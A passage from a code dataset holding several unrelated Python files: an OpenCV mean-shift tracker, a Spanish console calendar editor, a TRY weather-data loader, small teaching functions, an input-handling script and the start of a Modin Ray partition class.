lower means more accurate?\n termination_parameters = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 5, 5)\n\n while (True):\n start_time = time.time()\n ret, image = cap.read()\n\n if (hacky_click_has_occurred):\n for i in range(0, len(current_x)):\n track_window = (current_x[i], current_y[i], width, height)\n tracking_region = image[current_y[i]:current_y[i] + height, current_x[i]:current_x[i] + width]\n mask = cv2.inRange(tracking_region, np.array((0.0, 0.0, 0.0)), np.array((180.0, 180.0, 180.0)))\n tracking_region_hist = cv2.calcHist([tracking_region], [0], mask, [9], [0, 180])\n cv2.normalize(tracking_region_hist, tracking_region_hist, 0, 255, cv2.NORM_MINMAX)\n\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n back_propagation = cv2.calcBackProject([hsv_image], [0], tracking_region_hist, [0, 180], 1)\n ret, track_window = cv2.meanShift(back_propagation, track_window, termination_parameters)\n current_x[i] = track_window[0]\n current_y[i] = track_window[1]\n draw(track_window, image, (0, 255, 0))\n\n # Display the resulting frame\n cv2.imshow(windowName, image)\n\n inputKey = cv2.waitKey(waitTime) & 0xFF\n if inputKey == ord('q'):\n break\n elif inputKey == ord('t'):\n isTracking = not isTracking\n\n print(\"FPS: \", 1.0 / (time.time() - start_time))\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\n\nprint('Starting program')\nif __name__ == '__main__':\n arglist = sys.argv\n src = 0\n print('Argument count is ', len(arglist))\n if len(arglist) == 2:\n src = arglist[1]\n else:\n src = 0\n captureVideo(src)\nelse:\n print('Not in main')\n","sub_path":"openCV/extral/mean-shift-particle-filter-tracker/MeanShiftVector.py","file_name":"MeanShiftVector.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98610713","text":"from collections import namedtuple\nfrom datetime import datetime as Fecha\nfrom Bandeja_de_Entrada import es_numero, resumen_destinatarios\nfrom Correo import dudas_input, imprimir_mensaje\nfrom calendar import Calendar\nfrom Correo import error_destinatarios\n\ndef transformar_fecha_inverso(fecha):\n return f\"{fecha.year}-{cero(fecha.month)}-{cero(fecha.day)} \" \\\n f\"{cero(fecha.hour)}:{cero(fecha.minute)}:{cero(fecha.second)}\"\n\ndef archivo_perteneciente(evento):\n with open(\"data/db_events.csv\", encoding=\"utf-8\") as archivo:\n i = 0\n fecha_i, fecha_f = map(transformar_fecha_inverso, [evento.fecha_i,\n evento.fecha_f])\n for linea in archivo:\n\n if \",\".join([evento.propietario, f\"'{evento.nombre}'\", fecha_i,\n fecha_f, f\"'{evento.descripcion}'\"]) in linea.strip():\n return f\"0{i}\"\n i += 1\n with open(\"datos/eventos.csv\", encoding=\"utf-8\") as archivo:\n i = 0\n for linea in archivo:\n if \",\".join([evento.propietario, f\"'{evento.nombre}'\", fecha_i,\n fecha_f, f\"'{evento.descripcion}'\"]) in linea.strip():\n return f\"1{i}\"\n i += 1\n\ndef transformar_fecha(fecha, orden=False):\n fecha = fecha.strip()\n if orden:\n j = [6, -2, -8]\n else:\n j = [0 for i in range(3)]\n año = int(fecha[j[0]:4+j[0]])\n mes = int(fecha[5+j[1]:7+j[1]])\n dia = int(fecha[8+j[2]:10+j[2]])\n if len(fecha) == 10:\n return Fecha(año, mes, dia)\n hora = int(fecha[11:13])\n min = int(fecha[14:16])\n seg = int(fecha[17:19])\n return Fecha(año, mes, dia, hora, min, seg)\n\ndef generar_id(lista):\n propietario = lista[0]\n nombre = lista[1]\n fecha_i = lista[2]\n fecha_f = lista[3]\n id = 
fecha_i.replace(\"-\",\"\").replace(\":\",\"\").replace(\" \",\"\")\n id += fecha_f.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"\")\n id += nombre\n id += propietario\n return id\n\nEvento = namedtuple(\"Evento\", [\"propietario\", \"nombre\", \"fecha_i\",\n \"fecha_f\", \"descripcion\", \"invitados\",\n \"etiquetas\", \"id\"])\n\ndef obtener_eventos():\n archivo = open(\"./data/db_events.csv\", \"r\", encoding=\"utf-8\")\n lista_datos = archivo.readlines()[1:]\n archivo.close()\n archivo = open(\"./datos/eventos.csv\", \"r\", encoding=\"utf-8\")\n lista_datos.extend(archivo.readlines()[1:])\n archivo.close()\n datos = []\n\n for i in range(len(lista_datos)):\n indice_1 = lista_datos[i].find(\"'\")\n indice_2 = lista_datos[i][indice_1+1:].find(\"'\") + indice_1 + 1\n indice_4 = lista_datos[i].rfind(\"'\")\n indice_3 = lista_datos[i][indice_2+1:indice_4].find(\"'\") + indice_2 + 1\n lista = lista_datos[i][:indice_1 - 1].split(\",\")\n lista.append(lista_datos[i][indice_1 + 1:indice_2])\n lista.extend((lista_datos[i][indice_2 + 2:indice_3 - 1]).split(\",\"))\n lista.append(lista_datos[i][indice_3 + 1:indice_4])\n lista.extend(lista_datos[i][indice_4 + 2:].strip().split(\",\"))\n lista.append(generar_id(lista))\n lista[2] = transformar_fecha(lista[2])\n lista[3] = transformar_fecha(lista[3])\n #lista[5] = set(lista[5].split(\";\"))\n #lista[6] = set(lista[6].split(\";\"))\n datos.append(Evento(lista[0], lista[1], lista[2], lista[3], lista[4],\n lista[5], lista[6], lista[7]))\n #datos = sorted(datos, key=ordenar_eventos)\n return datos\n\ndef fechas_coinciden(fecha, fecha_i, fecha_f): #DLKJDÑLKJDLK\n fecha = fecha.lower()\n meses_escritos = \"enero.febrero.marzo.abril.mayo.junio.agosto.septiembre\" \\\n \".octubre.noviembre.diciembre\".split(\".\")\n meses_ingles = \"january.february.march.april.may.june.july.august\" \\\n \".september.october.november.december\".split(\".\")\n\ndef error_fecha(fecha):\n if fecha == \"\":\n return True\n fecha = fecha.lower().strip()\n numeros = list(\"0123456789\")\n if len(fecha) != 10 and len(fecha) != 19:\n return False\n for i in range(10):\n if i in [0, 1, 3, 4, 6, 7, 8, 9, 11, 12, 14, 15, 17, 18]:\n if fecha[i] not in numeros:\n return False\n elif i == 10 and fecha[i] != \" \":\n return False\n elif i in [2, 5] and fecha[i] != \"-\":\n return False\n elif i in [13, 16] and fecha[i] != \":\":\n return False\n j = [6, -2, -8]\n año = int(fecha[6:10])\n mes = int(fecha[3:5])\n dia = int(fecha[0:2])\n if mes > 12:\n return False\n lista_dias = list(Calendar().itermonthdays(año, mes))\n if dia > max(lista_dias):\n return False\n if len(fecha) == 10:\n return True\n hora = int(fecha[11:13])\n min = int(fecha[14:16])\n seg = int(fecha[17:19])\n if hora > 23 or min > 59 or seg > 59:\n return False\n return True\n\ndef ordenar_eventos(evento):\n return evento.id\n\ndef buscar_fecha(mes, fecha):\n dias = \"Lunes,Martes,Miércoles,Jueves,Viernes,Sábado,Domingo\".split(\",\")\n for semana in mes:\n for dia in semana:\n if fecha == dia[0]:\n return dias[dia[1]]\ndef cero(fecha):\n if len(str(fecha)) == 1:\n return f\"0{str(fecha)}\"\n return str(fecha)\n\ndef mostrar_fecha(fecha_i, fecha_f):\n meses = \"enero,febrero,marzo,abril,mayo,junio,agosto,septiembre,octubre,\" \\\n \"noviembre,diciembre\".split(\",\")\n if fecha_i.date() == fecha_f.date():\n if Fecha.today().year == fecha_i.day:\n año = \"\"\n else:\n año = f\" de {fecha_i.year}\"\n calendario_mes = Calendar().monthdays2calendar(fecha_i.year,\n fecha_i.month)\n dia = 
buscar_fecha(calendario_mes, fecha_i.day)\n return f\"{dia}, {fecha_i.day} de {meses[fecha_i.month]}\" \\\n f\"{año}\\n{cero(fecha_i.hour)}:{cero(fecha_i.minute)}:\" \\\n f\"{cero(fecha_i.second)} - \" \\\n f\"{cero(fecha_f.hour)}:{cero(fecha_f.minute)}:\" \\\n f\"{cero(fecha_f.second)}\"\n else:\n return f\"{fecha_i.day} de {meses[fecha_i.month]} de \" \\\n f\"{fecha_i.year}, \" \\\n f\"{cero(fecha_i.hour)}:{cero(fecha_i.minute)}:\" \\\n f\"{cero(fecha_i.second)} - \" \\\n f\"{fecha_f.day} de {meses[fecha_f.month]} de \" \\\n f\"{fecha_f.year}, \" \\\n f\"{cero(fecha_f.hour)}:{cero(fecha_f.minute)}:\" \\\n f\"{cero(fecha_f.second)}\"\n\ndef modificar_evento_editor(evento, opcion):\n usuario = evento.propietario\n nombre = evento.nombre\n fecha_i = evento.fecha_i\n fecha_f = evento.fecha_f\n descripcion = evento.descripcion\n invitados = evento.invitados\n etiquetas = evento.etiquetas\n while opcion != \"\":\n print(\"[0] Modificar Nombre\")\n print(\"[1] Modificar Fecha de Inicio\")\n print(\"[2] Modificar Fecha de Cierre\")\n print(\"[3] Modificar Descripción\")\n print(\"[4] Modificar Etiquetas\")\n print(\"[Enter] para volver\")\n opcion = input()\n while opcion not in [\"0\", \"1\", \"2\", \"3\", \"4\", \"\"]:\n opcion = dudas_input()\n if opcion == \"0\":\n print(\"_\" * 80)\n print(\"| Nombre\")\n nombre = input(\"| \")\n while len(nombre) > 50 or len(nombre) < 6:\n nombre = dudas_caracteres(\"Nombre del Evento\", 50, nombre, 6)\n print(\"_\" * 80)\n elif opcion == \"1\":\n print(\"_\"*80)\n fecha_i = input(\"| Desde: \")\n while not error_fecha(fecha_i):\n print(\n \"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\n \"El formato de fecha que soportamos es DD-MM-AAAA hh-mm-ss\")\n print(\"Por ejemplo: '01-08-2018', o '01-08-2018 01-20-30'\")\n print(\n \"Por favor, inténtelo de nuevo, o presione ENTER para utilizar \"\n \"la fecha actual\")\n fecha_i = input(\"| Fecha de inicio (DD-MM-AAAA): \")\n if fecha_i == \"\":\n fecha_i = Fecha.today()\n if not type(fecha_i) == Fecha:\n fecha_i = transformar_fecha(fecha_i, True)\n print(\"_\"*80)\n elif opcion == \"2\":\n print(\"_\"*80)\n fecha_f = input(\"| Hasta: \")\n while not error_fecha(fecha_f) or not comparar_fechas(fecha_i,\n fecha_f):\n if not error_fecha(fecha_f):\n print(\n \"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\n \"El formato de fecha que soportamos es DD-MM-AAAA hh-mm-ss\")\n print(\"Por ejemplo: '01-08-2018', o '01-08-2018 01-20-30'\")\n print(\n \"Por favor, inténtelo de nuevo, o presione ENTER para \"\n \"utilizar \"\n \"la fecha correspondiente a una hora después de la inicial\")\n if not comparar_fechas(fecha_i, fecha_f):\n print(\n \"Lo sentimos, la fecha de cierre debe ocurrir después que \"\n \"la de inicio.\")\n print(\n \"Por favor, inténtelo de nuevo, o presione ENTER para \"\n \"utilizar la fecha correspondiente a una hora después de la \"\n \"inicial\")\n fecha_f = input(\"| Fecha de cierre (DD-MM-AAAA): \")\n if fecha_f == \"\":\n fecha_f = fecha_i + timedelta(hours=1)\n if not type(fecha_f) == Fecha:\n fecha_f = transformar_fecha(fecha_f, True)\n print(\"_\"*80)\n elif opcion == \"3\":\n print(\"_\"*80)\n print(\"| Descripción\")\n descripcion = input(\"| \")\n if descripcion == \"\":\n descripcion = \"sin descripcion\"\n print(\"_\"*80)\n elif opcion == \"4\":\n print(\"_\"*80)\n print(\"| Etiquetas (separadas por coma)\")\n etiquetas = (\";\").join(input(\"| \").split(\",\"))\n if etiquetas == \"\":\n etiquetas = \"sin etiquetas\"\n print(\"_\"*80)\n 
else:\n continue\n if type(fecha_i) == Fecha:\n fecha_i_i, fecha_f_i = map(transformar_fecha_inverso,\n [fecha_i, fecha_f])\n else:\n fecha_i_i, fecha_f_i = fecha_i, fecha_f\n fecha_i, fecha_f = map(transformar_fecha,\n [fecha_i, fecha_f])\n evento_actual = Evento(usuario, nombre, fecha_i, fecha_f, descripcion,\n invitados, etiquetas,\n generar_id([usuario, nombre,\n fecha_i_i, fecha_f_i]))\n mostrar_info_evento(evento_actual, False, True)\n print(\"¿Desea realizar algún cambio?\")\n return usuario, nombre, fecha_i, fecha_f, descripcion, invitados, etiquetas\ndef editar_evento(evento):\n print(\"_\"*80)\n print(\"Editor de Eventos\")\n print(\"_\"*80)\n print(\"A continuación se presentan las acciones disponibles del editor\")\n print(\"[0] Volver a Resultados de la búsqueda\")\n print(\"[1] Editar atributos del evento\")\n print(\"[2] Eliminar evento\")\n print(\"[3] Agregar invitados\")\n print(\"[Enter] Volver al Menú\")\n opcion = input().lower()\n while opcion not in [\"0\", \"1\", \"2\", \"3\", \"\"]:\n print(\"Lo sentimos, estamos teniendo dificultades para entender tu \"\n \"respuesta\")\n print(\"Por favor, inténtelo de nuevo :D\")\n opcion = input().lower()\n if opcion in [\"1\", \"2\", \"3\"]:\n ubicacion = archivo_perteneciente(evento)\n file = int(ubicacion[0])\n indice = int(ubicacion[1])\n if file == 0:\n archivo = open(\"data/db_events.csv\", \"r\", encoding=\"utf-8\")\n lista_datos = archivo.readlines()\n archivo.close()\n archivo = open(\"data/db_events.csv\", \"w\", encoding=\"utf-8\")\n elif file == 1:\n archivo = open(\"./datos/eventos.csv\", \"r\", encoding=\"utf-8\")\n lista_datos = archivo.readlines()\n archivo.close()\n archivo = open(\"./datos/eventos.csv\", \"w\", encoding=\"utf-8\")\n if opcion == \"1\":\n mostrar_info_evento(evento, False, True)\n opcion = \"0\"\n usuario, nombre, fecha_i, fecha_f, descripcion, invitados, \\\n etiquetas = modificar_evento_editor(evento, opcion)\n if type(fecha_i) == Fecha:\n fecha_i, fecha_f = map(transformar_fecha_inverso, [fecha_i,\n fecha_f])\n lista_a_unir = [usuario, f\"'{nombre}'\", fecha_i, fecha_f,\n f\"'{descripcion}'\", invitados, etiquetas]\n lista_datos[indice] = \",\".join(lista_a_unir) + \"\\n\"\n elif opcion == \"2\":\n lista_datos.pop(indice)\n elif opcion == \"3\":\n print(\"A continuación puede agregar invitados\")\n print(\"| Invitados (separados por coma, en caso de ser más de uno)\")\n invitados = input(\"| \")\n if invitados == \"\":\n invitados = \"sin invitados\"\n else:\n invitados = \";\".join(error_destinatarios(invitados))\n if \"sin invitados\" in lista_datos[indice]:\n lista_datos[indice] = lista_datos[indice].replace(\"sin \"\n \"invitados\", invitados)\n if invitados != \"sin invitados\":\n indice_coma = lista_datos[indice].rfind(\",\")\n lista_datos[indice] = lista_datos[indice][:indice_coma] + \\\n \";\" + invitados + lista_datos[indice][\n indice_coma:]\n else:\n pass\n datos = \"\".join(lista_datos) + \"\\n\"\n archivo.write(datos)\n archivo.close()\n\ndef mostrar_info_evento(evento, crear_evento=False, editor=False, usuario=\"\"):\n print(\"_\"*80)\n print(evento.nombre)\n print(imprimir_mensaje(mostrar_fecha(evento.fecha_i, evento.fecha_f)))\n print(\"-\"*80)\n print(\"Creado por: \" + evento.propietario)\n if crear_evento:\n print(imprimir_mensaje(\"Invitados: \" +\n \", \".join(evento.invitados.split(\";\"))))\n elif editor:\n pass\n else:\n mas_invitados = resumen_destinatarios(evento.invitados.split(\";\"),\n \"invitados\")\n print(\"-\"*80)\n 
print(imprimir_mensaje(evento.descripcion))\n print(\"-\"*80)\n print(imprimir_mensaje(\"Etiquetas: \" +\n \", \".join(evento.etiquetas.split(\";\"))))\n print(\"_\"*80)\n if crear_evento or editor:\n return \"\"\n if mas_invitados:\n print(\"[0] Mostrar lista de invitados completa\")\n print(\"[1] Volver al Menú\")\n if usuario == evento.propietario:\n print(\"[2] Editar Evento\")\n print(\"[Enter] para volver a los Resultados de Búsqueda\")\n opcion = input().strip()\n while not opcion in [\"0\", \"1\", \"\", \"2\"]:\n opcion = dudas_input()\n if opcion == \"0\":\n print(imprimir_mensaje(\", \".join(evento.invitados.split(\";\")), \",\"))\n print(\"[1] Volver al Menú\")\n print(\"[2] Editar evento\")\n print(\"[Enter] para volver a los Resultados de Búsqueda\")\n opcion = input().strip()\n while not opcion in [\"1\", \"\", \"2\"]:\n opcion = dudas_input()\n if opcion == \"2\":\n editar_evento(evento)\n return \"menu\"\n if opcion == \"1\":\n return \"menu\"\n if opcion == \"\":\n return \"volver\"\n else:\n return \"volver\"\n\ndef mostrar_eventos(datos, buscador=False, usuario=\"\"):\n if len(datos) == 0:\n print(\"Lo sentimos, no encontramos eventos que coincidan con la \"\n \"búsqueda\")\n print(\"Por favor, inténtelo de nuevo :D\")\n return \"menu\"\n repetir = True\n while repetir:\n if buscador:\n print(\"-\"*80)\n print(\"Resultados de búsqueda\")\n print(\"-\"*80)\n for evento in enumerate(datos):\n print(\"| [\" + str(evento[0] + 1) + \"] \" + evento[1].nombre)\n print(\"-\"*80)\n print(\"Ingrese el {numero} del evento que desea revisar: \")\n print(\"[0] para realizar otra búsqueda\")\n print(\"[Enter] para volver al Menú\")\n numero = input()\n while not es_numero(numero, len(datos)):\n if numero == \"\":\n continue\n numero = dudas_input()\n if numero == \"\":\n return \"menu\"\n opcion = mostrar_info_evento(datos[int(numero) - 1], usuario=usuario)\n if opcion == \"volver\":\n repetir = True\n elif opcion == \"menu\":\n return opcion\n\n\n\ndef buscador_evento(datos, usuario):\n repetir = True\n while repetir:\n print(\"_\"*80)\n print(\"Buscador de Eventos\")\n print(\"_\"*80)\n print(\"Se presentarán los campos de intervalo de tiempo, nombre y \"\n \"etiquetas.\")\n print(\"Puede escribir los filtros a continuación\")\n print(\"Presione [Enter] si prefiere no especificar un campo\")\n fecha_i = input(\"Fecha de inicio: \").lower()\n while not error_fecha(fecha_i):\n print(\"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\"El formato de fecha que soportamos es DD-MM-AAAA hh-mm-ss\")\n print(\"Por ejemplo: '01-08-2018', o '01-08-2018 01-20-30'\")\n print(\"Por favor, inténtelo de nuevo, o presione ENTER para saltar \"\n \"este paso\")\n fecha_i = input(\"Fecha de inicio (DD-MM-AAAA): \").lower()\n fecha_f = input(\"Fecha de cierre: \").lower()\n while not error_fecha(fecha_f):\n print(\"Lo sentimos, tenemos problemas con interpretar esta fecha.\")\n print(\"El formato de fecha que soportamos es DD-MM-AAAA\")\n print(\"Por ejemplo: 01-08-2018\")\n print(\"Por favor, inténtelo de nuevo, o presione ENTER para saltar \"\n \"este paso\")\n fecha_i = input(\"Fecha de cierre (DD-MM-AAAA): \").lower()\n\n nombre = input(\"Nombre: \").lower()\n etiquetas = input(\"Etiquetas (separadas por coma): \").lower().split(\",\")\n listo_fi, listo_ff, listo_nombre, listo_etiquetas = [False for i in\n range(4)]\n fecha_i_set, fecha_f_set, nombre_set, etiquetas_set = [set() for i in\n range(4)]\n if fecha_i == \"\":\n listo_fi = True\n fecha_i_set = set(datos)\n else:\n 
fecha_i= transformar_fecha(fecha_i, True)\n if fecha_f == \"\":\n listo_ff = True\n fecha_f_set = set(datos)\n else:\n fecha_f = transformar_fecha(fecha_f, True)\n if nombre == \"\":\n listo_nombre = True\n nombre_set = set(datos)\n if etiquetas == [\"\"]:\n listo_etiquetas = True\n etiquetas_set = set(datos)\n listo_todo = False\n if listo_etiquetas and listo_ff and listo_fi and listo_nombre:\n listo_todo = True\n resultado_busqueda = set()\n for evento in datos:\n if usuario == evento.propietario or usuario in \\\n evento.invitados.split(\";\"):\n if listo_todo:\n resultado_busqueda.add(evento)\n else:\n if not listo_fi and evento.fecha_i >= fecha_i:\n fecha_i_set.add(evento)\n if not listo_ff and evento.fecha_f <= fecha_i:\n fecha_f_set.add(evento)\n if not listo_nombre and nombre in evento.nombre.lower():\n nombre_set.add(evento)\n if not listo_etiquetas:\n etiqueta_encontrada = False\n for etiquetas_de_evento in evento.etiquetas.split(\";\"):\n if etiqueta_encontrada:\n continue\n for etiqueta_buscada in etiquetas:\n if etiqueta_encontrada:\n continue\n if etiqueta_buscada.strip() in etiquetas_de_evento.lower():\n etiqueta_encontrada = True\n if etiqueta_encontrada:\n etiquetas_set.add(evento)\n if not listo_todo:\n resultado_busqueda = fecha_i_set & fecha_f_set & \\\n nombre_set & etiquetas_set\n resultado_busqueda = sorted(list(resultado_busqueda), key=ordenar_eventos)\n opcion = mostrar_eventos(resultado_busqueda, True, usuario)\n if opcion == \"menu\":\n repetir = False\n elif opcion == \"volver\":\n repetir = True\n\n\n","sub_path":"Tareas/T00/Calendario.py","file_name":"Calendario.py","file_ext":"py","file_size_in_byte":21225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445424391","text":"# -*- coding: UTF-8 -*-\n\n\n\n\"\"\"\ndownload and extract TRY-dataset from\nhttp://www.irbnet.de/daten/baufo/20118035316/TRY2011_Datensatz.zip\n\"\"\"\n\n\nimport os\nimport codecs\n\nTRY_COLUMNS = [(\"region\", int, None),\n (\"station\", int, None),\n (\"month\", int, None),\n (\"day\", int, None),\n (\"hour\", int, None),\n (\"coverage\", int, \"1/8\"),\n (\"wind_direction\", int, \"deg\"),\n (\"wind_speed\", float, \"m/s\"),\n (\"air_temperature\", float, \"degC\"),\n (\"air_pressure\", float, \"hPa\"),\n (\"water_vapour\", float, \"g/kg\"),\n (\"rel_humidity\", int, \"%\"),\n (\"weather\", int, None),\n (\"dir_radiation\", int, \"W/m2\"),\n (\"diff_radiation\", int, \"W/m2\"),\n (\"radiation_info\", int, None),\n (\"atm_irradiance\", int, \"W/m2\"),\n (\"terr_irradiance\", int, \"W/m2\"),\n (\"irradiance_quality\", int, None)]\n \n\nTRY_COLUMNNAMES = [x[0] for x in TRY_COLUMNS]\nTRY_DTYPES = [x[1] for x in TRY_COLUMNS]\nTRY_UNITS = [x[2] for x in TRY_COLUMNS]\n \nTRY_YTYPE = dict(Wint=0, Jahr=1, Somm=2)\n\nMO_FORMATSTR = [\"\\t%d\\t\" + {int:\"%d\", float:\"%f\"}[dtype] for dtype in TRY_DTYPES]\n\ndef load_try(path, with_hoy=True):\n \"\"\" returns \n \"\"\"\n f = codecs.open(filename=path, mode=\"r\", encoding=\"latin-1\")\n lines = f.readlines()\n f.close()\n result = []\n start = False\n for line in lines:\n if not(start):\n start = line.startswith(\"***\")\n continue\n line = line.strip()\n cells = line.split(\" \")\n cells = [cell for cell in cells if cell]\n row = [TRY_DTYPES[i](cells[i]) for i in range(19)]\n assert len(cells) == 19\n result.append(row)\n \n assert len(result) == 8760\n if with_hoy:\n result = [[i] + result[i] for i in range(8760)]\n return result\n\ndef load_try_da(path):\n data = load_try(path, 
with_hoy=False)\n res = dict.fromkeys(TRY_COLUMNNAMES)\n for i in range(len(TRY_COLUMNNAMES)):\n res[TRY_COLUMNNAMES[i]] = [data[j][i] for j in range(8760)]\n return res\n \ndef write_tt(trydata, basedir):\n \"\"\" writes modelica conform timetable text file \"\"\"\n for i in range(len(TRY_COLUMNS)):\n s = \"#1\\n\"\n s += \"\\ndouble %s(8760, 2)\\n\" % TRY_COLUMNS[i]\n s += \"\\n\".join([MO_FORMATSTR[i] % (row[0], row[i+1]) for row in trydata])\n filename = \"%s.txt\" % TRY_COLUMNS[i]\n path = os.path.join(basedir, filename) \n f = open(path, \"w+t\")\n f.write(s)\n f.close()\n \ndef try2mo(src_path, dest_path):\n trydata = load_try(src_path)\n write_tt(trydata, dest_path)\n \n### TEST\n\ndef test():\n pass\n\nif __name__ == \"__main__\":\n test()","sub_path":"plx/sci/meteo/dwdtry/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"363943028","text":"def f(n):\n assert n >= 0\n answer = 1\n while n > 1:\n answer *= n\n n -= 1\n return answer\n\n\ndef fact(n):\n assert n >= 0\n if n <= 1:\n return\n else:\n return n * fact(n - 1)\n\n\ndef g(n):\n x = 0\n for i in range(n):\n for j in range(n):\n x += 1\n return x\n\n\ndef h(x):\n assert type(x) == int and x >= 0\n answer = 0\n s = str(x)\n for c in s:\n answer += int(c)\n return answer\n\n\nprint(f(1))\nprint(fact(1))\nprint(g(1))\nprint(h(1))\n","sub_path":"mitAlgorithms.py","file_name":"mitAlgorithms.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"79737697","text":"\nimport sys\n\nclass BadInputError(Exception): pass\n\ndef getCommandSet(s, char, p=False):\n return set(','.join(c1+c2 if p else ','.join((c1, c1+c2)) \n for c1, c2 in zip(s, char*len(s))).split(','))\n\ncommandsSet = getCommandSet(\"mftd\", 'a')\n\ndef anySetter(*conds, seq=None):\n return any((len(txt) == conds[0] if type(conds[0]) == int \n else len(txt) == txt.count(conds[0])) if len(conds) == 1 \n else len(txt) in {txt.count(ch) for ch in conds[1]} for txt in seq)\n\ndef inputChecker(msg, seq=commandsSet):\n inpt = input(msg)\n if len(inpt) in {inpt.count(c) for c in \"bde\"}:\n seq = seq | {c*len(inpt) for c in \"bde\"}\n if inpt not in seq:\n print(\"\\nERROR: Bad Input!\")\n return inputChecker(msg, seq)\n return inpt \n\ndef getInputs(*args):\n all_data, inType, table, inData, msg, num, lastIn = args\n all_ins = [] if not all_data else all_data\n if len(all_ins) == 0 or any(d in {'del', 'b'} for d in (inType, table, inData)):\n print(\"\\n\\n{} \\nb = step back \\nd*N = delete \\npress ENTER to cancel\".format(msg))\n while True:\n if not inType:\n inType = inputChecker('\\n'+\"INPUT\"+'\\n'+\"manually(m/all=ma)\"+'\\n'+\" file(f/all=fa): \")\n lastIn = inType\n \n avalSettings = [d for d in (inType, table, inData) if d is not None]\n if anySetter(0, \"de\", seq=avalSettings):\n num -= 1\n break\n if anySetter('b', seq=avalSettings):\n return getInputs(all_ins, None, None, None, '', num-1, None)\n \n ((all_ins if any(inData==c for c in (None, 'del')) else all_ins.append(inData)) \n if avalSettings[-1] != 'da' else print(\"0 INPUTS\", all_ins.clear()))\n print(all_ins, num)\n \n if table in getCommandSet('tx', 'a'):\n table = None if table in \"tx\" else table\n inData = input(\"Paste Dataset: \" if inType in {'m', 'ma'} else \"Fname: \")\n inType = None if inType not in getCommandSet(\"mf\", 'a', p=True) else inType\n return getInputs(all_ins, 
inType, table, inData, msg, num+1, inData)\n else:\n table = inputChecker(\"Table?(t, ta): \", seq=getCommandSet('tx', 'a'))\n return getInputs(all_ins, inType, table if len(table) > 0 else 'x', None, '', num, table)\n \n if inType in {'f', 'fa'}:\n with open(inData, 'r', encoding='utf8') as fi:\n inData = fi.readlines() if input(\"Table(t)?: \") == 't' else fi.read()\n\n if len(all_ins) == 0 or any(len(d)==d.count('e') for d in avalSettings if len(d)>0):\n num = 0 if len(all_ins) == 0 else num\n getInputs(all_ins, None, None, None, '', num, lastIn) if input(\"No data, exit?: \" \n if lastIn != 'e' else \"Exit?: \").lower() != \"y\" else sys.exit()\n \n if len(lastIn) > 0 and lastIn.count('d') == len(lastIn):\n n = len(lastIn) if len(lastIn) <= len(all_ins) else len(all_ins)\n i = 0\n while i < n:\n del all_ins[-1]\n i += 1\n return getInputs(all_ins, inType, table, 'del', \"\\ndeleted {} dataset{}\".format(\n n, '' if n == 1 else 's'), num-n, lastIn)\n if len(lastIn) == 0:\n return all_ins\n\n\nclass Datas: \n\n def __init__(self, all_data=None):\n # default arguments are evaluated once, at definition time; calling\n # getInputs() in the signature would start the interactive prompt as\n # soon as the class body runs, so defer it to instantiation instead\n if all_data is None:\n all_data = getInputs(*[None for i in range(5)], 0, None)\n self.all_ins = all_data\n self.data_Nsets = len(self.all_ins)\n \n def printAll(self):\n print(\"\\n\\nall data\\n{}\\n\\nnumber of datasets\\n{}\\n\".\n format(self.all_ins, self.data_Nsets))\n \n def compareDatasets(self):\n for dataset in self.all_ins:\n print(dataset)\n print(len(dataset))\n\nx = Datas()\nx.printAll()\nx.compareDatasets()\n","sub_path":"P1_v3.py","file_name":"P1_v3.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
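A note on the `Datas` fix above: Python evaluates default-argument expressions once, when the `def` statement executes, so the original `__init__(self, all_data=getInputs(...))` triggered the whole interactive input flow the moment the class body ran. A minimal sketch of the gotcha and the usual None-sentinel workaround (the names here are illustrative, not from the file):

import time

def stamp_eager(msg, ts=time.time()):   # ts is frozen at definition time
    return msg, ts

def stamp_lazy(msg, ts=None):
    if ts is None:                      # sentinel defers evaluation to call time
        ts = time.time()
    return msg, ts

# stamp_eager returns the same timestamp on every call; stamp_lazy does not.

+{"seq_id":"54346519","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. 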
See the License for the specific language\n# governing permissions and limitations under the License.\n\n\"\"\"Module houses class that wraps data (block partition) and its metadata.\"\"\"\n\nimport pandas\n\nfrom modin.data_management.utils import length_fn_pandas, width_fn_pandas\nfrom modin.engines.base.frame.partition import PandasFramePartition\nfrom modin.pandas.indexing import compute_sliced_len\n\nimport ray\nfrom ray.services import get_node_ip_address\nfrom packaging import version\n\nObjectIDType = ray.ObjectRef\nif version.parse(ray.__version__) >= version.parse(\"1.2.0\"):\n from ray.util.client.common import ClientObjectRef\n\n ObjectIDType = (ray.ObjectRef, ClientObjectRef)\n\ncompute_sliced_len = ray.remote(compute_sliced_len)\n\n\nclass PandasOnRayFramePartition(PandasFramePartition):\n \"\"\"\n The class implements the interface in ``PandasFramePartition``.\n\n Parameters\n ----------\n object_id : ray.ObjectRef\n A reference to the ``pandas.DataFrame`` that needs to be wrapped with this class.\n length : ray.ObjectRef or int, optional\n Length of the wrapped ``pandas.DataFrame``, or a reference to it.\n width : ray.ObjectRef or int, optional\n Width of the wrapped ``pandas.DataFrame``, or a reference to it.\n ip : 